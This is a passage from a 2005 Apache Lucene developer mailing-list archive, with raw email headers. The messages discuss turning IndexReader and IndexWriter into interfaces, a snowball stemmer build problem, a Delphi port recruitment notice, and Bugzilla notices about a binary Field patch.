X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from ns.part.net (HELO mail.part.net) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 17 Mar 2005 07:34:30 -0800 Received: from [161.129.204.104] ([161.129.204.104]) by mail.part.net with esmtp; Thu, 17 Mar 2005 08:34:28 -0700 Message-ID: <[email protected]> Date: Thu, 17 Mar 2005 08:34:26 -0700 From: Todd VanderVeen <[email protected]> User-Agent: Mozilla Thunderbird 0.9 (Windows/20041103) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: Interfaces References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Erik Hatcher wrote: > I think, though I'm not speaking for anyone here but myself, that the > Lucene team is open to API improvements that _do not adversely affect > performance_ and that have _a real benefit_. > > While I'm as IoC and design pattern savvy as the next developer, I'm > also highly pragmatic. I've not been convinced by any of the examples > thus far. If a unit test needs to detect if a document has been > added, you can check the size of the index before and after for > example, rather than doing some mock trickery to hook the addDocument > call. Or you could use AspectJ to do this if you really wanted to get > fancy. The unit test example shown is really a unit test appropriate > to Lucene itself, and not to a project using Lucene, it seems. > Pragmatically, have you ever had addDocument fail? If not, then what > peace of mind are you getting from such a test? > > Ultimately, though, the decision to refactor the codebase to use > interfaces more pervasively lies with Doug. > > Erik > I have seen this and several other similar requests dismissed with similar reasoning. I, myself, once made similar requests of the abstract classes in the analysis package. Yes, there are lots of ways to skin a cat, but I would ask that a different question be asked, "'What is risked in giving the flexibility to the user base to do it their way?" These requests are often simply an appeal for flexibility. I can understand the maintainers concerns about increasingly non-uniform use of the API and associated cost of helping those experimenting. I don't know how comfortable the maintainers are with simply letting these people work it out for themselves or with the help of others in the forum, but I hope these concerns are weighed against the possible benefits to the people doing the myriad and sundry things they do with open source projects. Flexibility is a real benefit. Cheers, Todd VanderVeen --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 17 15:55:22 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30707 invoked from network); 17 Mar 2005 15:55:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 17 Mar 2005 15:55:22 -0000 Received: (qmail 78291 invoked by uid 500); 17 Mar 2005 15:55:19 -0000 Delivered-To: [email protected] Received: (qmail 78225 invoked by uid 500); 17 Mar 2005 15:55:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 78211 invoked by uid 99); 17 Mar 2005 15:55:18 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=DNS_FROM_RFC_ABUSE,RCVD_BY_IP,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from rproxy.gmail.com (HELO rproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 17 Mar 2005 07:55:17 -0800 Received: by rproxy.gmail.com with SMTP id f1so4190rne for <[email protected]>; Thu, 17 Mar 2005 07:55:15 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding; b=gqqQjmSBW7bKJhiWS5oE2s5cDVlRWrd4hoUjptcEFGgv4VmuT7+rDKp9BqJ+FPTF93vMxSo5QcynKrPaQuViHRzqEhSyMQorTNM6xKsJFrhAunkulryOBvXg1XLA+48Gp32z0x5Y+sOFMRBMW4zBgWA9/f4WT3LEv1GuOefFpEw= Received: by 161.129.204.104 with SMTP id 58mr1589944rni; Thu, 17 Mar 2005 07:55:14 -0800 (PST) Received: by 161.129.204.104 with HTTP; Thu, 17 Mar 2005 07:55:14 -0800 (PST) Message-ID: <[email protected]> Date: Thu, 17 Mar 2005 10:55:14 -0500 From: "Mario Alejandro M." <[email protected]> Reply-To: "Mario Alejandro M." <[email protected]> To: [email protected] Subject: Wanted Delphi developers for MUTIS (Lucene port to Delphi) Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N If some delphi developer read this list, MUTIS is looking for more developers. Read in https://sourceforge.net/people/viewjob.php?group_id=3D130034&job_id=3D21616= . --=20 Mario Alejandro Montoya MCP www.solucionesvulcano.com !Obtenga su sitio Web din=E1mico! --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 17 15:58:32 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 32401 invoked from network); 17 Mar 2005 15:58:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 17 Mar 2005 15:58:32 -0000 Received: (qmail 90720 invoked by uid 500); 17 Mar 2005 15:58:29 -0000 Delivered-To: [email protected] Received: (qmail 90689 invoked by uid 500); 17 Mar 2005 15:58:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 90676 invoked by uid 99); 17 Mar 2005 15:58:29 -0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from smtpauth06.mail.atl.earthlink.net (HELO smtpauth06.mail.atl.earthlink.net) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 17 Mar 2005 07:58:27 -0800 Received: from [161.129.204.104] (helo=ENGELSSERVER) by smtpauth06.mail.atl.earthlink.net with asmtp (Exim 4.34) id 1DBxOC-0002mI-BJ for [email protected]; Thu, 17 Mar 2005 10:58:24 -0500 Reply-To: <[email protected]> From: "Robert Engels" <[email protected]> To: <[email protected]> Subject: RE: Interfaces Date: Thu, 17 Mar 2005 09:58:24 -0600 Message-ID: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.6604 (9.0.2911.0) In-Reply-To: <[email protected]> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180 X-ELNK-Trace: 33cbdd8ed9881ca8776432462e451d7bd15d05d9470ff710259f32223bd0c3d790200b8ff0003516350badd9bab72f9c350badd9bab72f9c350badd9bab72f9c X-Originating-IP: 161.129.204.104 X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N I only speak from current project experience, where we've developed a "search server" utilizing lucene , utilizing custom indexing formats in order to support high-speed incremental indexing. It was necessary to extend IndexReader in order to have the rest of the searching framework work properly, even though I use NO METHODS in the base class. Seems silly. -----Original Message----- From: Erik Hatcher [mailto:[email protected]] Sent: Thursday, March 17, 2005 5:31 AM To: [email protected] Subject: Re: Interfaces I think, though I'm not speaking for anyone here but myself, that the Lucene team is open to API improvements that _do not adversely affect performance_ and that have _a real benefit_. While I'm as IoC and design pattern savvy as the next developer, I'm also highly pragmatic. I've not been convinced by any of the examples thus far. If a unit test needs to detect if a document has been added, you can check the size of the index before and after for example, rather than doing some mock trickery to hook the addDocument call. Or you could use AspectJ to do this if you really wanted to get fancy. The unit test example shown is really a unit test appropriate to Lucene itself, and not to a project using Lucene, it seems. Pragmatically, have you ever had addDocument fail? If not, then what peace of mind are you getting from such a test? Ultimately, though, the decision to refactor the codebase to use interfaces more pervasively lies with Doug. Erik On Mar 17, 2005, at 2:40 AM, Konstantin Priblouda wrote: > > --- Robert Engels <[email protected]> wrote: > >> I've been pushing for making IndexReader and >> IndexWriter interfaces for a >> long time (and changing lucene core to use them), >> but there seems a >> reluctance to do so (although I am not sure why). >> The current factory >> methods could be easily moved to a IndexReaderWriter >> factory class. Probably >> a top-level interface IndexReaderWriter with methods >> like isWritable() for >> "read only" indices, and methods getReader(), >> getWriter(). > > > Hi guys, > what about making lucene a bit more IoC Friendly? > ( I speak of providing objects that can be created wia > constructor, and not by factory ) > > I'm tired of writing adapter classes... > > regards, > > ----[ Konstantin Pribluda ( ko5tik ) ]---------------- > Plugins for xdoclet-2 are released. check it out at: > http://www.sourceforge.net/projects/xdoclet-plugins/ > ----[ http://www.pribluda.de ]------------------------ > > > > __________________________________ > Do you Yahoo!? > Yahoo! Small Business - Try our new resources site! > http://smallbusiness.yahoo.com/resources/ > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 17 18:18:18 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 10488 invoked from network); 17 Mar 2005 18:18:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 17 Mar 2005 18:18:17 -0000 Received: (qmail 37383 invoked by uid 500); 17 Mar 2005 18:18:15 -0000 Delivered-To: [email protected] Received: (qmail 37358 invoked by uid 500); 17 Mar 2005 18:18:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 37326 invoked by uid 99); 17 Mar 2005 18:18:14 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from rwcrmhc11.comcast.net (HELO rwcrmhc11.comcast.net) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 17 Mar 2005 10:18:13 -0800 Received: from [161.129.204.104] (c-24-5-160-217.client.comcast.net[161.129.204.104]) by comcast.net (rwcrmhc11) with ESMTP id <2005031718181201300eed1le>; Thu, 17 Mar 2005 18:18:12 +0000 Message-ID: <[email protected]> Date: Thu, 17 Mar 2005 10:18:11 -0800 From: Doug Cutting <[email protected]> User-Agent: Mozilla Thunderbird 0.9 (X11/20041127) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: Interfaces References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Erik Hatcher wrote: > Ultimately, though, the decision to refactor the codebase to use > interfaces more pervasively lies with Doug. Actually the decision lies not with me, but with the Lucene PMC as a group, according to Apache's voting process: http://www.apache.org/foundation/voting.html But, like other PMC members, I do have veto power. Fortunately I've never had to use it. We've always come to agreement through reasoned argument. In this particular case, I do not object to making interfaces for IndexReader and IndexWriter. What we need is a well-designed, back-compatible, fully-javadoc'd patch that implements this. Folks (including myself) may have reasonable objections to the first version. So it will take some patience and determination to make such a change to these core classes. My guess at the best way to approach this is to add new interfaces (e.g., named IndexReadable and IndexWritable) and to then have IndexReader and IndexWriter implement these. That makes back-compatibility easier. Then one could add factories too. Someone proposed IndexReaderWriterFactory as a name. Why not just call this IndexFactory? Finally, this change, on its own, is not a high-priority for me. Long term, I hope we can re-structure these APIs to make them extensible in more interesting ways. Consider point 11 in section 1.2 of http://wiki.apache.org/jakarta-lucene/Lucene2Whiteboard as an example. This sort of thing would probably best be implemented by decomposing IndexWriter and IndexReader into sets of interfaces. But until we do that I don't think I would make use of interfaces here. So if others would make good use of these interfaces, then the onus is on them to make the change. Doug --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 17 19:13:02 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 36394 invoked from network); 17 Mar 2005 19:13:02 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 17 Mar 2005 19:13:02 -0000 Received: (qmail 71201 invoked by uid 500); 17 Mar 2005 19:13:00 -0000 Delivered-To: [email protected] Received: (qmail 70940 invoked by uid 500); 17 Mar 2005 19:12:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 70927 invoked by uid 99); 17 Mar 2005 19:12:59 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from rwcrmhc13.comcast.net (HELO rwcrmhc13.comcast.net) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 17 Mar 2005 11:12:58 -0800 Received: from [161.129.204.104] (c-24-5-160-217.client.comcast.net[161.129.204.104]) by comcast.net (rwcrmhc13) with ESMTP id <2005031719125501500ellr7e>; Thu, 17 Mar 2005 19:12:56 +0000 Message-ID: <[email protected]> Date: Thu, 17 Mar 2005 11:12:55 -0800 From: Doug Cutting <[email protected]> User-Agent: Mozilla Thunderbird 0.9 (X11/20041127) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: snowball analyzer uismo issue in spanish stemmer References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Erik Hatcher wrote: > I just tried regenerating, which automatically pulls from CVS, and got > this error: > > /Users/erik/dev/lucene/java/contrib/snowball/snowball/website/p/ > generator.c:425: internal compiler error: in extract_insn, at recog.c:2175 > [apply] Please submit a full bug report, > [apply] with preprocessed source if appropriate. > [apply] See <URL:http://developer.apple.com/bugreporter> for > instructions. > > BUILD FAILED > /Users/erik/dev/lucene/java/contrib/snowball/build.xml:40: apply > returned: 1 > > I haven't tried this in a long time - anyone know what the issue is? Works for me today on Linux. And it looks like you were eventually able to run it yesterday, since there's new code checked in. But I didn't see a commit message. Why would that be? Doug --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 17 20:09:40 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 65511 invoked from network); 17 Mar 2005 20:09:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 17 Mar 2005 20:09:39 -0000 Received: (qmail 82001 invoked by uid 500); 17 Mar 2005 20:09:38 -0000 Delivered-To: [email protected] Received: (qmail 81549 invoked by uid 500); 17 Mar 2005 20:09:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 81509 invoked by uid 99); 17 Mar 2005 20:09:37 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from Unknown (HELO ehatchersolutions.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 17 Mar 2005 12:09:36 -0800 Received: by ehatchersolutions.com (Postfix, from userid 504) id 41E8C13E200A; Thu, 17 Mar 2005 15:09:34 -0500 (EST) Received: from [161.129.204.104] (d-128-167-124.bootp.Virginia.EDU [161.129.204.104]) by ehatchersolutions.com (Postfix) with ESMTP id 4848A13E200A for <[email protected]>; Thu, 17 Mar 2005 15:09:20 -0500 (EST) Mime-Version: 1.0 (Apple Message framework v619.2) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Erik Hatcher <[email protected]> Subject: Re: snowball analyzer uismo issue in spanish stemmer Date: Thu, 17 Mar 2005 15:09:26 -0500 To: [email protected] X-Mailer: Apple Mail (2.619.2) X-Spam-Checker-Version: SpamAssassin 3.0.1 (2004-10-22) on javelina X-Spam-Status: No, score=-3.2 required=5.0 tests=AWL,BAYES_00 autolearn=ham version=3.0.1 X-Spam-Level: X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N On Mar 17, 2005, at 2:12 PM, Doug Cutting wrote: > Erik Hatcher wrote: >> I just tried regenerating, which automatically pulls from CVS, and >> got this error: >> /Users/erik/dev/lucene/java/contrib/snowball/snowball/website/p/ >> generator.c:425: internal compiler error: in extract_insn, at >> recog.c:2175 >> [apply] Please submit a full bug report, >> [apply] with preprocessed source if appropriate. >> [apply] See <URL:http://developer.apple.com/bugreporter> for >> instructions. >> BUILD FAILED >> /Users/erik/dev/lucene/java/contrib/snowball/build.xml:40: apply >> returned: 1 >> I haven't tried this in a long time - anyone know what the issue is? > > Works for me today on Linux. And it looks like you were eventually > able to run it yesterday, since there's new code checked in. But I > didn't see a commit message. Why would that be? I got the commit message. I'm not sure if my regeneration worked fully, but it all compiled fine and the (1?) test ran successfully. If you see regeneration differences would you please commit them? Erik --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 17 20:21:27 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 85771 invoked from network); 17 Mar 2005 20:21:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 17 Mar 2005 20:21:22 -0000 Received: (qmail 8181 invoked by uid 500); 17 Mar 2005 20:21:20 -0000 Delivered-To: [email protected] Received: (qmail 8146 invoked by uid 500); 17 Mar 2005 20:21:20 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 8133 invoked by uid 99); 17 Mar 2005 20:21:20 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from rwcrmhc11.comcast.net (HELO rwcrmhc11.comcast.net) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 17 Mar 2005 12:21:19 -0800 Received: from [161.129.204.104] (c-24-5-160-217.client.comcast.net[161.129.204.104]) by comcast.net (rwcrmhc11) with ESMTP id <2005031720211701300ec8pre>; Thu, 17 Mar 2005 20:21:17 +0000 Message-ID: <[email protected]> Date: Thu, 17 Mar 2005 12:21:16 -0800 From: Doug Cutting <[email protected]> User-Agent: Mozilla Thunderbird 0.9 (X11/20041127) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: snowball analyzer uismo issue in spanish stemmer References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Erik Hatcher wrote: > If you see regeneration differences would you please commit them? There were no differences. Doug --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Mar 18 02:29:19 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51415 invoked from network); 18 Mar 2005 02:29:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 18 Mar 2005 02:29:19 -0000 Received: (qmail 83391 invoked by uid 500); 18 Mar 2005 02:29:17 -0000 Delivered-To: [email protected] Received: (qmail 83352 invoked by uid 500); 18 Mar 2005 02:29:16 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 83338 invoked by uid 500); 18 Mar 2005 02:29:16 -0000 Delivered-To: [email protected] Received: (qmail 83335 invoked by uid 99); 18 Mar 2005 02:29:16 -0000 X-ASF-Spam-Status: No, hits=0.2 required=10.0 tests=NO_REAL_NAME X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 17 Mar 2005 18:29:15 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j2I2TCA6011002 for <[email protected]>; Fri, 18 Mar 2005 03:29:12 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j2I2TC4R011000; Fri, 18 Mar 2005 03:29:12 +0100 Date: Fri, 18 Mar 2005 03:29:12 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 34066] New: - [PATCH] Extension to binary Fields that allows fixed byte buffer X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=34066>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=34066 Summary: [PATCH] Extension to binary Fields that allows fixed byte buffer Product: Lucene Version: CVS Nightly - Specify date in submission Platform: All OS/Version: All Status: NEW Severity: normal Priority: P3 Component: Index AssignedTo: [email protected] ReportedBy: [email protected] This is a very simple patch that supports storing binary values in the index more efficiently. A new Field constructor accepts a length argument, allowing a fixed byte[] to be reused acrossed multiple calls with arguments of different sizes. A companion change to FieldsWriter uses this length when storing and/or compressing the field. There is one remaining case in Document. Intentionally, no direct accessor to the length of a binary field is provided from Document, only from Field. This is because Field's created by FieldReader will never have a specified length and this is usual case for Field's read from Document. It seems less confusing for most users. I don't believe any upward incompatibility is introduced here (e.g., from the possibility of getting a larger byte[] than actually holds the value from Document), since no such byte[] values are possible without this patch anyway. The compression case is still inefficient (much copying), but it is hard to see how Lucene can do too much better. However, the application can do the compression externally and pass in the reused compression-output buffer as a binary value (which is what I'm doing). This represents a substantialy allocation savings for storing large documents bodies (compressed) into the Lucene index. Two patch files are attached, both created by svn on 3/17/05. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Mar 18 02:30:54 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52089 invoked from network); 18 Mar 2005 02:30:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 18 Mar 2005 02:30:54 -0000 Received: (qmail 85762 invoked by uid 500); 18 Mar 2005 02:30:52 -0000 Delivered-To: [email protected] Received: (qmail 85729 invoked by uid 500); 18 Mar 2005 02:30:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 85707 invoked by uid 500); 18 Mar 2005 02:30:51 -0000 Delivered-To: [email protected] Received: (qmail 85702 invoked by uid 99); 18 Mar 2005 02:30:51 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 17 Mar 2005 18:30:50 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j2I2UlnA011034 for <[email protected]>; Fri, 18 Mar 2005 03:30:47 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j2I2Ul7K011032; Fri, 18 Mar 2005 03:30:47 +0100 Date: Fri, 18 Mar 2005 03:30:47 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 34066] - [PATCH] Extension to binary Fields that allows fixed byte buffer X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=34066>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=34066 ------- Additional Comments From [email protected] 2005-03-18 03:30 ------- Created an attachment (id=14514) --> (http://issues.apache.org/bugzilla/attachment.cgi?id=14514&action=view) (1 of 2) Patch to Field.java to support lengths on binary values -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Mar 18 02:31:42 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52310 invoked from network); 18 Mar 2005 02:31:42 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 18 Mar 2005 02:31:42 -0000 Received: (qmail 86969 invoked by uid 500); 18 Mar 2005 02:31:41 -0000 Delivered-To: [email protected] Received: (qmail 86521 invoked by uid 500); 18 Mar 2005 02:31:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 86508 invoked by uid 500); 18 Mar 2005 02:31:40 -0000 Delivered-To: [email protected] Received: (qmail 86505 invoked by uid 99); 18 Mar 2005 02:31:39 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 17 Mar 2005 18:31:38 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j2I2VZZK011047 for <[email protected]>; Fri, 18 Mar 2005 03:31:35 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j2I2VZbh011045; Fri, 18 Mar 2005 03:31:35 +0100 Date: Fri, 18 Mar 2005 03:31:35 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 34066] - [PATCH] Extension to binary Fields that allows fixed byte buffer X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=34066>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=34066 ------- Additional Comments From [email protected] 2005-03-18 03:31 ------- Created an attachment (id=14515) --> (http://issues.apache.org/bugzilla/attachment.cgi?id=14515&action=view) (2 of 2) Patch to FieldsWriter to write binary values using length from Field -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Mar 18 03:10:45 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 64077 invoked from network); 18 Mar 2005 03:10:45 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 18 Mar 2005 03:10:45 -0000 Received: (qmail 40397 invoked by uid 500); 18 Mar 2005 03:10:43 -0000 Delivered-To: 